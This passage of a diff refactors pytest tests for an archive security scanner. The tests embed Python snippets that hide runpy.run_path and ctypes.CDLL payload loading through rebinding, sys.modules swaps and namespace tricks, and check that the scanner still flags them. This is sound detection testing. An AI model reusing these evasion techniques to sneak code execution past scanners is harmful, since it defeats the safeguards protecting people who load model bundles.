webbrowser\n" + "browser = webbrowser.get('safe')\n" + "browser.open = len\n" + "browser = webbrowser.get('other')\n" + "browser.open('https://example.invalid')\n" + "loader = ctypes.LibraryLoader(ctypes.CDLL)\n" + "loader.payload = len\n" + "loader = ctypes.LibraryLoader(ctypes.CDLL)\n" + "loader.payload\n" + ), + ("high-risk calls: ctypes.LibraryLoader.payload"), + ) -def test_scan_zip_preserves_dynamic_member_risk_after_same_name_reassignment(tmp_path: Path) -> None: +def test_scan_zip_restores_dynamic_member_risk_after_delete(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" source = ( "import ctypes\n" "import webbrowser\n" - "browser = webbrowser.get('safe')\n" - "browser.open = len\n" - "browser = webbrowser.get('other')\n" - "browser.open('https://example.invalid')\n" - "loader = ctypes.LibraryLoader(ctypes.CDLL)\n" - "loader.payload = len\n" - "loader = ctypes.LibraryLoader(ctypes.CDLL)\n" - "loader.payload\n" - ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - checks_by_rule = {check.rule_code: check for check in python_checks} - assert checks_by_rule["S109"].details["reason"] == "high-risk calls: webbrowser.open" - assert checks_by_rule["S110"].details["reason"] == "high-risk calls: ctypes.LibraryLoader.payload" - - -def test_scan_zip_restores_dynamic_member_risk_after_delete(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = ( - "import ctypes\n" - "import webbrowser\n" - "browser = webbrowser.get()\n" + "browser = webbrowser.get()\n" "browser.open = len\n" "del browser.open\n" "browser.open('https://example.invalid')\n" @@ -1825,10 +1444,7 @@ def test_scan_zip_restores_dynamic_member_risk_after_delete(tmp_path: Path) -> N "del ctypes.windll.payload\n" "ctypes.windll.payload\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") python_checks = [ check @@ -1859,10 +1475,7 @@ def test_scan_zip_restores_dynamic_member_risk_after_delattr_and_namespace_rebin "globals()['loader'] = ctypes.LibraryLoader(ctypes.CDLL)\n" "loader.payload\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") python_checks = [ check @@ -1889,10 +1502,7 @@ def test_scan_zip_restores_loader_method_risk_after_delete(tmp_path: Path) -> No "delattr(*(loader, '__getattr__'))\n" "loader.__getattr__('getattrpayload')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") python_checks = [ check @@ -1917,19 +1527,9 @@ def test_scan_zip_preserves_ctypes_subclass_with_class_local_init_alias(tmp_path "MyCDLL('/tmp/payload.so')\n" "ctypes.LibraryLoader(MyCDLL).payload\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S110" - assert python_checks[0].details["reason"] == "high-risk calls: ctypes.CDLL, ctypes.LibraryLoader.payload" + _assert_zip_python_finding_at_path( + archive_path, source, "S110", "high-risk calls: ctypes.CDLL, ctypes.LibraryLoader.payload" + ) def test_scan_zip_preserves_ctypes_subclass_class_body_and_qualified_init_aliases(tmp_path: Path) -> None: @@ -1993,10 +1593,7 @@ def test_scan_zip_preserves_ctypes_subclass_class_body_and_qualified_init_aliase " return object()\n" "ctypes.LibraryLoader(ReachableNewCDLL).reachable\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") python_checks = [ check @@ -2028,14 +1625,7 @@ def test_scan_zip_ignores_unreachable_ctypes_cdll_subclass_initializer(tmp_path: " super().__init__(name)\n" "ctypes.LibraryLoader(SafeCDLL).payload\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) def test_scan_zip_preserves_restored_runpy_execution_after_static_overwrite(tmp_path: Path) -> None: @@ -2047,19 +1637,7 @@ def test_scan_zip_preserves_restored_runpy_execution_after_static_overwrite(tmp_ "runpy.run_path = original\n" "runpy.run_path('payload.py')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S108" - assert python_checks[0].details["reason"] == "high-risk calls: runpy.run_path" + _assert_zip_python_finding_at_path(archive_path, source, "S108", "high-risk calls: runpy.run_path") @pytest.mark.parametrize( @@ -2095,19 +1673,7 @@ def test_scan_zip_preserves_restored_runpy_execution_after_namespace_overwrite(t "original = runpy.run_path\n" "rp.run_path = len\n" + restore + "rp.run_path('payload.py')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S108" - assert python_checks[0].details["reason"] == "high-risk calls: runpy.run_path" + _assert_zip_python_finding_at_path(archive_path, source, "S108", "high-risk calls: runpy.run_path") @pytest.mark.parametrize( @@ -2135,14 +1701,7 @@ def test_scan_zip_preserves_restored_runpy_execution_after_namespace_overwrite(t def test_scan_zip_preserves_safe_runpy_namespace_overwrite(tmp_path: Path, overwrite: str) -> None: archive_path = tmp_path / "model_bundle.zip" source = "import runpy\n" + overwrite + "runpy.run_path('safe')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) @pytest.mark.parametrize( @@ -2172,18 +1731,7 @@ def test_scan_zip_preserves_safe_runpy_namespace_overwrite(tmp_path: Path, overw ], ) def test_scan_zip_preserves_risk_in_namespace_update_values(tmp_path: Path, source: str, rule_code: str) -> None: - archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == rule_code - for check in result.checks - ) + _assert_zip_python_rule(tmp_path, source, rule_code) def test_scan_zip_remains_conservative_after_unresolved_namespace_update(tmp_path: Path) -> None: @@ -2194,17 +1742,7 @@ def test_scan_zip_remains_conservative_after_unresolved_namespace_update(tmp_pat "loader = print if runpy.run_path else ctypes.CDLL\n" "loader('payload.so')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S110" - for check in result.checks - ) + _assert_zip_python_rule_at_path(archive_path, source, "S110") def test_scan_zip_remains_conservative_after_helper_builtin_mutation(tmp_path: Path) -> None: @@ -2214,17 +1752,7 @@ def test_scan_zip_remains_conservative_after_helper_builtin_mutation(tmp_path: P "def disable():\n builtins.print = False\n" "disable()\nrunner = print or rp.run_path\nrunner('payload.py')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S108" - for check in result.checks - ) + _assert_zip_python_rule_at_path(archive_path, source, "S108") def test_scan_zip_does_not_treat_shadowed_dict_update_as_builtin_descriptor(tmp_path: Path) -> None: @@ -2240,14 +1768,7 @@ def test_scan_zip_does_not_treat_shadowed_dict_update_as_builtin_descriptor(tmp_ "dict.update(runpy.__dict__, run_path=runpy.run_path)\n" "runpy.run_path('safe')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) @pytest.mark.parametrize( @@ -2269,14 +1790,7 @@ def test_scan_zip_does_not_treat_shadowed_builtins_dict_update_as_descriptor(tmp f"{prefix}(runpy.__dict__, run_path=runpy.run_path)\n" "runpy.run_path('safe')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) def test_scan_zip_remains_conservative_after_shadowed_mutating_dict_update(tmp_path: Path) -> None: @@ -2293,17 +1807,7 @@ def test_scan_zip_remains_conservative_after_shadowed_mutating_dict_update(tmp_p "runner = print or rp.run_path\n" "runner('payload.py')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S108" - for check in result.checks - ) + _assert_zip_python_rule_at_path(archive_path, source, "S108") @pytest.mark.parametrize( @@ -2474,18 +1978,7 @@ def test_scan_zip_remains_conservative_after_shadowed_mutating_dict_update(tmp_p ], ) def test_scan_zip_does_not_exempt_noncanonical_inert_method_dispatch(tmp_path: Path, source: str) -> None: - archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S108" - for check in result.checks - ) + _assert_zip_python_rule(tmp_path, source, "S108") def test_scan_zip_detects_restore_after_inert_shadowed_method_is_rebound(tmp_path: Path) -> None: @@ -2502,17 +1995,7 @@ def test_scan_zip_detects_restore_after_inert_shadowed_method_is_rebound(tmp_pat "Safe.update(rp.__dict__, run_path=original)\n" "rp.run_path('payload.py')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S108" - for check in result.checks - ) + _assert_zip_python_rule_at_path(archive_path, source, "S108") def test_scan_zip_preserves_inert_method_across_dormant_unknown_call(tmp_path: Path) -> None: @@ -2527,14 +2010,7 @@ def test_scan_zip_preserves_inert_method_across_dormant_unknown_call(tmp_path: P " callback()\n" "Safe.update()\nrp.run_path('safe')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) def test_scan_zip_preserves_inert_method_with_literal_class_metadata(tmp_path: Path) -> None: @@ -2550,14 +2026,7 @@ def test_scan_zip_preserves_inert_method_with_literal_class_metadata(tmp_path: P " pass\n" "Safe.update()\nrp.run_path('safe')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) def test_scan_zip_tracks_module_member_write_through_sys_modules(tmp_path: Path) -> None: @@ -2568,17 +2037,7 @@ def test_scan_zip_tracks_module_member_write_through_sys_modules(tmp_path: Path) "sys.modules['runpy'].run_path = original\n" "runpy.run_path('payload.py')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S108" - for check in result.checks - ) + _assert_zip_python_rule_at_path(archive_path, source, "S108") def test_scan_zip_tracks_module_namespace_write_through_sys_modules(tmp_path: Path) -> None: @@ -2589,50 +2048,19 @@ def test_scan_zip_tracks_module_namespace_write_through_sys_modules(tmp_path: Pa "sys.modules['runpy'].__dict__['run_path'] = original\n" "runpy.run_path('payload.py')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S108" - for check in result.checks - ) + _assert_zip_python_rule_at_path(archive_path, source, "S108") def test_scan_zip_tracks_module_replacement_through_sys_modules_import(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = "import ctypes\nimport sys\nsys.modules['runpy'] = ctypes\nimport runpy\nrunpy.CDLL('payload')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S110" - and check.details["reason"] == "high-risk calls: ctypes.CDLL" - for check in result.checks + _assert_ctypes_module_replacement( + tmp_path, ("import ctypes\nimport sys\nsys.modules['runpy'] = ctypes\nimport runpy\nrunpy.CDLL('payload')\n") ) def test_scan_zip_tracks_module_replacement_through_sys_modules_from_import(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = "import ctypes\nimport sys\nsys.modules['runpy'] = ctypes\nfrom runpy import CDLL\nCDLL('payload')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S110" - and check.details["reason"] == "high-risk calls: ctypes.CDLL" - for check in result.checks + _assert_ctypes_module_replacement( + tmp_path, + ("import ctypes\nimport sys\nsys.modules['runpy'] = ctypes\nfrom runpy import CDLL\nCDLL('payload')\n"), ) @@ -2652,19 +2080,8 @@ def test_scan_zip_tracks_module_replacement_through_sys_modules_from_import(tmp_ def test_scan_zip_tracks_module_replacement_through_sys_modules_method_from_import( tmp_path: Path, replacement_source: str ) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = f"import ctypes\nimport sys\n{replacement_source}\nfrom runpy import CDLL\nCDLL('payload')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S110" - and check.details["reason"] == "high-risk calls: ctypes.CDLL" - for check in result.checks + _assert_ctypes_module_replacement( + tmp_path, f"import ctypes\nimport sys\n{replacement_source}\nfrom runpy import CDLL\nCDLL('payload')\n" ) @@ -2678,33 +2095,15 @@ def test_scan_zip_tracks_module_replacement_through_sys_modules_method_from_impo def test_scan_zip_tracks_module_replacement_through_sys_modules_wildcard_import( tmp_path: Path, replacement_source: str ) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = f"import ctypes\nimport sys\n{replacement_source}\nfrom runpy import *\nCDLL('payload')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S110" - and check.details["reason"] == "high-risk calls: ctypes.CDLL" - for check in result.checks + _assert_ctypes_module_replacement( + tmp_path, f"import ctypes\nimport sys\n{replacement_source}\nfrom runpy import *\nCDLL('payload')\n" ) def test_scan_zip_ignores_missing_member_after_sys_modules_import_replacement(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" source = "import ctypes\nimport sys\nsys.modules['runpy'] = ctypes\nimport runpy\nrunpy.run_path('payload.py')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) def test_scan_zip_reimports_tracked_module_after_sys_modules_deletion(tmp_path: Path) -> None: @@ -2716,17 +2115,7 @@ def test_scan_zip_reimports_tracked_module_after_sys_modules_deletion(tmp_path: "import runpy as rp\n" "rp.run_path('payload.py')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S108" - for check in result.checks - ) + _assert_zip_python_rule_at_path(archive_path, source, "S108") @pytest.mark.parametrize( @@ -3039,18 +2428,7 @@ def test_scan_zip_reimports_tracked_module_after_sys_modules_deletion(tmp_path: ], ) def test_scan_zip_invalidates_state_after_user_protocol_dispatch(tmp_path: Path, source: str) -> None: - archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S108" - for check in result.checks - ) + _assert_zip_python_rule(tmp_path, source, "S108") def test_scan_zip_invalidates_state_after_implicit_builtin_object_dunder_dispatch(tmp_path: Path) -> None: @@ -3064,17 +2442,7 @@ def test_scan_zip_invalidates_state_after_implicit_builtin_object_dunder_dispatc "object.__getattribute__(mutate, '__call__')()\n" "runpy.run_path('payload.py')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S108" - for check in result.checks - ) + _assert_zip_python_rule_at_path(archive_path, source, "S108") @pytest.mark.parametrize( @@ -3101,17 +2469,7 @@ def test_scan_zip_invalidates_state_after_noncanonical_module_truth_test(tmp_pat "b.__class__ = Meta\n" + truth_test + "runner = print or rp.run_path\n" "runner('payload.py')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S108" - for check in result.checks - ) + _assert_zip_python_rule_at_path(archive_path, source, "S108") @pytest.mark.parametrize( @@ -3198,17 +2556,7 @@ def test_scan_zip_invalidates_state_after_noncanonical_module_protocol_use(tmp_p "b.__class__ = Meta\n" + protocol_use + "runner = print or rp.run_path\n" "runner('payload.py')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S108" - for check in result.checks - ) + _assert_zip_python_rule_at_path(archive_path, source, "S108") def test_scan_zip_does_not_execute_deferred_noncanonical_module_protocol(tmp_path: Path) -> None: @@ -3224,14 +2572,7 @@ def test_scan_zip_does_not_execute_deferred_noncanonical_module_protocol(tmp_pat "unused = (item for item in [1] if b)\n" "rp.run_path('safe')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) def test_scan_zip_does_not_invalidate_state_after_module_identity_comparison(tmp_path: Path) -> None: @@ -3252,14 +2593,7 @@ def test_scan_zip_does_not_invalidate_state_after_module_identity_comparison(tmp " pass\n" "rp.run_path('safe')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) def test_scan_zip_does_not_evaluate_postponed_protocol_annotations(tmp_path: Path) -> None: @@ -3278,14 +2612,7 @@ def test_scan_zip_does_not_evaluate_postponed_protocol_annotations(tmp_path: Pat " pass\n" "rp.run_path('safe')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) def test_scan_zip_does_not_evaluate_empty_comprehension_filters(tmp_path: Path) -> None: @@ -3301,14 +2628,7 @@ def test_scan_zip_does_not_evaluate_empty_comprehension_filters(tmp_path: Path) "unused = [item for item in [] if b]\n" "rp.run_path('safe')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) def test_scan_zip_does_not_evaluate_lambda_body_in_comprehension(tmp_path: Path) -> None: @@ -3319,14 +2639,7 @@ def test_scan_zip_does_not_evaluate_lambda_body_in_comprehension(tmp_path: Path) "unused = [(lambda: callback()) for item in [1]]\n" "rp.run_path('safe')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) def test_scan_zip_tracks_restored_builtins_dict_descriptor(tmp_path: Path) -> None: @@ -3346,19 +2659,7 @@ def test_scan_zip_tracks_restored_builtins_dict_descriptor(tmp_path: Path) -> No "builtins.dict.update(runpy.__dict__, run_path=original)\n" "runpy.run_path('payload.py')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S108" - assert python_checks[0].details["reason"] == "high-risk calls: runpy.run_path" + _assert_zip_python_finding_at_path(archive_path, source, "S108", "high-risk calls: runpy.run_path") @pytest.mark.parametrize( @@ -3385,19 +2686,7 @@ def test_scan_zip_preserves_canonical_dict_descriptor_after_conditional_shadow( f"{restore}(runpy.__dict__, run_path=original)\n" "runpy.run_path('payload.py')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S108" - assert python_checks[0].details["reason"] == "high-risk calls: runpy.run_path" + _assert_zip_python_finding_at_path(archive_path, source, "S108", "high-risk calls: runpy.run_path") def test_scan_zip_preserves_runpy_execution_after_import_rebinds_module(tmp_path: Path) -> None: @@ -3405,71 +2694,31 @@ def test_scan_zip_preserves_runpy_execution_after_import_rebinds_module(tmp_path source = ( "class Dummy:\n pass\nrunpy = Dummy()\nrunpy.run_path = len\nimport runpy\nrunpy.run_path('payload.py')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S108" - assert python_checks[0].details["reason"] == "high-risk calls: runpy.run_path" + _assert_zip_python_finding_at_path(archive_path, source, "S108", "high-risk calls: runpy.run_path") def test_scan_zip_clears_imported_static_members_after_alias_rebind(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" source = "class Safe:\n run_path = len\nimport runpy as rp\nrp = Safe()\nrp.run_path([])\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) def test_scan_zip_preserves_safe_module_member_overwrite_after_reimport(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" source = "import runpy as rp\nrp.run_path = len\nimport runpy as rp\nrp.run_path([])\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) def test_scan_zip_preserves_safe_module_member_overwrite_after_alias_reimport(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" source = "import runpy as rp\nrp.run_path = print\nrp = object()\nimport runpy as rp\nrp.run_path('safe')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) def test_scan_zip_preserves_safe_module_member_overwrite_after_same_name_reimport(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" source = "import runpy\nrunpy.run_path = print\nrunpy = object()\nimport runpy\nrunpy.run_path('safe')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) def test_scan_zip_does_not_apply_unexecuted_member_write_to_reimport(tmp_path: Path) -> None: @@ -3481,35 +2730,13 @@ def test_scan_zip_does_not_apply_unexecuted_member_write_to_reimport(tmp_path: P "import runpy as mod\n" "mod.run_path('payload.py')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S108" - for check in result.checks - ) + _assert_zip_python_rule_at_path(archive_path, source, "S108") def test_scan_zip_preserves_runpy_member_after_harmless_reimport(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" source = "import runpy as rp\nimport runpy as rp\nrp.run_path('payload.py')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S108" - assert python_checks[0].details["reason"] == "high-risk calls: runpy.run_path" + _assert_zip_python_finding_at_path(archive_path, source, "S108", "high-risk calls: runpy.run_path") @pytest.mark.parametrize("rebinding", ["rp = rp", "rp = runpy"]) @@ -3518,32 +2745,13 @@ def test_scan_zip_preserves_runpy_member_after_module_preserving_alias_assignmen ) -> None: archive_path = tmp_path / "model_bundle.zip" source = f"import runpy\nimport runpy as rp\n{rebinding}\nrp.run_path('payload.py')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S108" - assert python_checks[0].details["reason"] == "high-risk calls: runpy.run_path" + _assert_zip_python_finding_at_path(archive_path, source, "S108", "high-risk calls: runpy.run_path") def test_scan_zip_preserves_safe_runpy_overwrite_before_conditional(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" source = "import runpy\nrunpy.run_path = len\nif replace:\n runpy.run_path = str\nrunpy.run_path([])\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) @pytest.mark.parametrize( @@ -3556,16 +2764,7 @@ def test_scan_zip_preserves_safe_runpy_overwrite_before_conditional(tmp_path: Pa ], ) def test_scan_zip_allows_shadowed_direct_python_member_primitives(tmp_path: Path, source: str) -> None: - archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert result.success is True - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_shadowed_member_primitive(tmp_path, source, ("model_bundle.zip")) @pytest.mark.parametrize( @@ -3864,15 +3063,7 @@ def test_scan_zip_allows_shadowed_direct_python_member_primitives(tmp_path: Path ], ) def 